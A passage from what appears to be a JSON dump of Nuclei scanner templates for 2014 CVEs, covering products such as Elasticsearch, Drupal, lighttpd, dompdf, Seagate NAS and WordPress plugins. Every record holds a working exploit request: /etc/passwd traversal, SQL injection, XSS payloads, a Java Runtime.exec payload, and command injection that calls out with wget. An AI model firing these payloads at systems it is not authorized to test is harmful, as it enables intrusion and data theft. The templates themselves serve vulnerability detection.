https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/\n - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2321\n - http://www.kb.cert.org/vuls/id/600724\n - http://www.myxzy.com/post-411.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C\n cvss-score: 10\n cve-id: CVE-2014-2321\n cwe-id: CWE-264\n epss-score: 0.96364\n epss-percentile: 0.99452\n cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zte\n product: f460\n tags: cve2014,cve,iot,zte\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web_shell_cmd.gch\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"please input shell command\"\n - \"ZTE Corporation. All rights reserved\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022023bcec4a925719964d361455cce2d3185288b3dd03c0a9b3a61f8704b16ca756022100e7f90ae800794e873f1ef774d97e8007a67fbc2cf35e4fde660f40f31f262a43:922c64590222798bb761d5b6d8e72950", "hash": "0f1309d88ae728b5ea913557e2564c9b", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f10" }, "name": "CVE-2014-2323.yaml", "content": "id: CVE-2014-2323\n\ninfo:\n name: Lighttpd 1.4.34 SQL Injection and Path Traversal\n author: geeknik\n severity: critical\n description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).\n impact: |\n Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive data and remote code execution\n remediation: |\n Upgrade to a patched version of Lighttpd or apply the necessary security patches\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2323\n - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt\n - http://www.lighttpd.net/2014/3/12/1.4.35/\n - 
http://seclists.org/oss-sec/2014/q1/561\n - http://jvn.jp/en/jp/JVN37417423/index.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-2323\n cwe-id: CWE-89\n epss-score: 0.96033\n epss-percentile: 0.99445\n cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lighttpd\n product: lighttpd\n tags: cve2014,cve,lighttpd,injection,seclists,sqli\n\nhttp:\n - raw:\n - |+\n GET /etc/passwd HTTP/1.1\n Host: [::1]' UNION SELECT '/\n\n unsafe: true\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0:\"\n# digest: 4b0a00483046022100e371572751932d4a500df96a892091eba4e0a4d8ce6a52634b13e38cd64f05cc022100dcb4be0eedfb4cb66a15ce756a7a6db6b4fd32eb5bd445bc094c025d8706bfd0:922c64590222798bb761d5b6d8e72950", "hash": "5b2dbd58f7d3c7cad5e5ea297087c2ed", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f11" }, "name": "CVE-2014-2383.yaml", "content": "id: CVE-2014-2383\n\ninfo:\n name: Dompdf < v0.6.0 - Local File Inclusion\n author: 0x_Akoko,akincibor,ritikchaddha\n severity: medium\n description: |\n A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.\n impact: |\n The vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the affected system.\n remediation: |\n Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/33004\n - http://seclists.org/fulldisclosure/2014/Apr/258\n - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/\n - 
https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2383\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2014-2383\n cwe-id: CWE-200\n epss-score: 0.00511\n epss-percentile: 0.76134\n cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 11\n vendor: dompdf\n product: dompdf\n tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n - \"{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/pdf\"\n - 'filename=\"dompdf_out.pdf\"'\n 
condition: and\n\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200f047a6a60901eeb5016353d7e3b93092b406eb7c4eaa8ecf9759f8b6ea7e81a022100c25b83b98679c1421d0b2383cdc9c6f9c736059731e9452b26d580b80e55e4ee:922c64590222798bb761d5b6d8e72950", "hash": "0483a45274e8d4817135915b1b72ac4b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f12" }, "name": "CVE-2014-2908.yaml", "content": "id: CVE-2014-2908\n\ninfo:\n name: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.\n remediation: Upgrade to v4.0 or later.\n reference:\n - https://www.exploit-db.com/exploits/44687\n - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2908\n - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02\n - http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-892012.pdf\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2014-2908\n cwe-id: CWE-79\n epss-score: 0.00594\n epss-percentile: 0.76056\n cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: siemens\n product: simatic_s7_cpu_1200_firmware\n tags: cve2014,cve,xss,siemens,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n 
words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202a67b8f296a38cdec3cc9fadbed079d23964fcd5973e2a30a4ebc3588772051e022100acee6714b419eaf8cf4ab99aef816ab12d1a04410e9aef0c8a18a45744943b0d:922c64590222798bb761d5b6d8e72950", "hash": "a5064a22738bb9d5429f3641fcefd090", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f13" }, "name": "CVE-2014-2962.yaml", "content": "id: CVE-2014-2962\n\ninfo:\n name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal\n author: daffainfo\n severity: high\n description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.\n impact: |\n An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system.\n remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.\n reference:\n - https://www.kb.cert.org/vuls/id/774788\n - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l\n - http://www.kb.cert.org/vuls/id/774788\n - http://www.belkin.com/us/support-article?articleNum=109400\n - https://www.exploit-db.com/exploits/38488/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2014-2962\n cwe-id: CWE-22\n epss-score: 0.95825\n epss-percentile: 0.99395\n cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: belkin\n product: n150_f9k1009_firmware\n tags: cve2014,cve,lfi,router,firmware,traversal,belkin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: 
status\n status:\n - 200\n# digest: 4a0a00473045022032e80b0db58d467a4ce0dccb54620714fa677489117263f882c989d96adb1e9b022100a4a43436790a6bfae53280a94851a270b2f0ae270d5b78e1c53f5be7f1911963:922c64590222798bb761d5b6d8e72950", "hash": "e9c3e51ac4ef904ce6812ce37dc59ade", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f14" }, "name": "CVE-2014-3120.yaml", "content": "id: CVE-2014-3120\n\ninfo:\n name: ElasticSearch v1.1.1/1.2 RCE\n author: pikpikcu\n severity: medium\n description: |\n The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.\n impact: |\n Allows remote attackers to execute arbitrary code on the affected system\n remediation: |\n Upgrade to a patched version of ElasticSearch\n reference:\n - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120\n - https://www.elastic.co/blog/logstash-1-4-3-released\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3120\n - http://bouk.co/blog/elasticsearch-rce/\n - https://www.elastic.co/community/security/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2014-3120\n cwe-id: CWE-284\n epss-score: 0.53209\n epss-percentile: 0.97551\n cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: elasticsearch\n product: elasticsearch\n tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic\n\nhttp:\n - raw:\n - |\n POST /_search?pretty HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Language: en\n Content-Type: application/x-www-form-urlencoded\n\n {\n \"size\": 1,\n \"query\": {\n \"filtered\": {\n \"query\": {\n \"match_all\": {\n }\n }\n }\n },\n \"script_fields\": {\n \"command\": {\n 
\"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n }\n }\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203c75efbf9b064d21bacbd48c486b930e90217b4ae6e2d0ae67761ed727e5ae1c022100e524324c159f69fa14357b63d62c412273768e8b0377d797d5d02df83e454767:922c64590222798bb761d5b6d8e72950", "hash": "a68ecff20bf05ea8ab12e7ef7e98d4a9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f15" }, "name": "CVE-2014-3206.yaml", "content": "id: CVE-2014-3206\n\ninfo:\n name: Seagate BlackArmor NAS - Command Injection\n author: gy741\n severity: critical\n description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.\n remediation: |\n Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3206\n - https://www.exploit-db.com/exploits/33159\n - https://www.exploit-db.com/exploits/33159/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-3206\n cwe-id: CWE-20\n epss-score: 0.2561\n epss-percentile: 0.96594\n cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: seagate\n product: 
blackarmor_nas_220_firmware\n tags: cve2014,cve,seagate,rce,edb\n\nhttp:\n - raw:\n - |\n GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n unsafe: true\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950", "hash": "91945361c96863527a99cc64718ecfce", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f16" }, "name": "CVE-2014-3704.yaml", "content": "id: CVE-2014-3704\n\ninfo:\n name: Drupal SQL Injection\n author: princechaddha\n severity: high\n description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and its underlying database.\n remediation: Upgrade to Drupal core 7.32 or later.\n reference:\n - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3704\n - https://www.drupal.org/SA-CORE-2014-005\n - https://www.exploit-db.com/exploits/34984\n - https://www.exploit-db.com/exploits/34992\n - https://www.exploit-db.com/exploits/34993\n - https://www.exploit-db.com/exploits/35150\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2014-3704\n cwe-id: CWE-89\n epss-score: 0.97537\n 
epss-percentile: 0.99992\n cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: drupal\n product: drupal\n shodan-query: http.component:\"drupal\"\n tags: cve2014,cve,edb,drupal,sqli\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/?q=node&destination=node\"\n\n body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"PDOException\"\n - '{{md5({{num}})}}'\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 490a0046304402207af10a42ac3fac82b8537fcd02ef03a3d6d1c789570c336dd960af2488b7656a02200bf8bf6552331293f0e50b7c92c5874a81bc4df67abaae00fa0bd4042a8ea2fe:922c64590222798bb761d5b6d8e72950", "hash": "0739356f6eefbac58d11166623bd9caa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f17" }, "name": "CVE-2014-3744.yaml", "content": "id: CVE-2014-3744\n\ninfo:\n name: Node.js st module Directory Traversal\n author: geeknik\n severity: high\n description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.\n remediation: |\n Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-3744\n - https://github.com/advisories/GHSA-69rr-wvh9-6c4q\n - https://snyk.io/vuln/npm:st:20140206\n - https://nodesecurity.io/advisories/st_directory_traversal\n - http://www.openwall.com/lists/oss-security/2014/05/13/1\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: 
CVE-2014-3744\n cwe-id: CWE-22\n epss-score: 0.00672\n epss-percentile: 0.77635\n cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nodejs\n product: node.js\n tags: cve2014,cve,lfi,nodejs,st\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203d8c11ba1a31ffd7910585875338d74bcd708cd45c0dced1bc16f9ac789f0d3f022100d17f317a0370341a66779fb76b7e4559c2db7104613304dbd1455b6344151bfe:922c64590222798bb761d5b6d8e72950", "hash": "7da9466146de1ab9b114b8d8383a1355", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f18" }, "name": "CVE-2014-4210.yaml", "content": "id: CVE-2014-4210\n\ninfo:\n name: Oracle Weblogic - Server-Side Request Forgery\n author: princechaddha\n severity: medium\n description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources.\n remediation: |\n Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability\n reference:\n - https://www.oracle.com/security-alerts/cpujul2014.html\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4210\n - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html\n - http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html\n - http://seclists.org/fulldisclosure/2014/Dec/23\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2014-4210\n cwe-id: NVD-CWE-noinfo\n epss-score: 0.96955\n epss-percentile: 0.9967\n cpe: 
cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: fusion_middleware\n shodan-query: title:\"Weblogic\"\n tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"Search public registries\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205b0c4c45a1197068fe3d1c2e791783fc70cbcc9d3206f6e804636e2d200cef0c022100fc157a501cabd7d4201b7164e0daf392f982fa00c7962aa21e21c9b38dbd4618:922c64590222798bb761d5b6d8e72950", "hash": "339bbb6c8242bc016472c4d536af07f9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f19" }, "name": "CVE-2014-4513.yaml", "content": "id: CVE-2014-4513\n\ninfo:\n name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade to a patched version of ActiveHelper LiveHelp Server or apply the necessary security patches to mitigate the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4513\n - 
http://codevigilant.com/disclosure/wp-plugin-activehelper-livehelp-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2014-4513\n cwe-id: CWE-79\n epss-score: 0.00145\n epss-percentile: 0.50288\n cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: activehelper\n product: activehelper_livehelp_live_chat\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/activehelper-livehelp\"\n tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'ActiveHelper LiveHelp Live Chat'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c70973326dc4da5c4130c3180aa50e32ccedebe17dfc3e2135ce622c7d93307b022029ca8cebdadfded9c3a554c78cf22248ac02a412d228fa50c9063bc9be53c4bd:922c64590222798bb761d5b6d8e72950", "hash": "34f1a8a6a193fcd1f2e2b2abae1b3f9e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1a" }, "name": "CVE-2014-4535.yaml", "content": "id: CVE-2014-4535\n\ninfo:\n name: Import Legacy Media <= 0.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A 
cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: |\n Update to the latest version of the Import Legacy Media plugin (0.1 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4535\n - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4535\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48664\n cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: import_legacy_media_project\n product: import_legacy_media\n framework: wordpress\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/import-legacy-media/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'>\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4a0a00473045022100c947aed3c99938dc952b322d6f2b1729438092660b31ff1c90783264a24cb01a0220265888536b4943a2204bc4141bffa43c67384e2b3be7f962cbf86d397dde8d17:922c64590222798bb761d5b6d8e72950", "hash": "ed3ae07f948d5a003d27ce2034d03347", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1b" }, "name": "CVE-2014-4536.yaml", "content": "id: CVE-2014-4536\n\ninfo:\n name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade Infusionsoft Gravity Forms Add-on to version 1.5.7 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f\n - https://nvd.nist.gov/vuln/detail/CVE-2014-4536\n - http://wordpress.org/plugins/infusionsoft/changelog\n - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-4536\n cwe-id: CWE-79\n epss-score: 0.00149\n epss-percentile: 0.50857\n cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: katz\n product: infusionsoft_gravity_forms\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/infusionsoft/Infusionsoft/\"\n tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET 
/wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Infusionsoft'\n - 'Tags:'\n condition: and\n case-insensitive: true\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204632ba857d80985897ff6ed55d02178be53aea7b5bbeeb24fcd6e920d59022ed022100e4aa6568eb57f3a3597613e71186f142e2d44b6a70d5ad43a297aa76e6a2d89b:922c64590222798bb761d5b6d8e72950", "hash": "c3dc1e77d1af5f97825172a11e96efb0", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f1c" 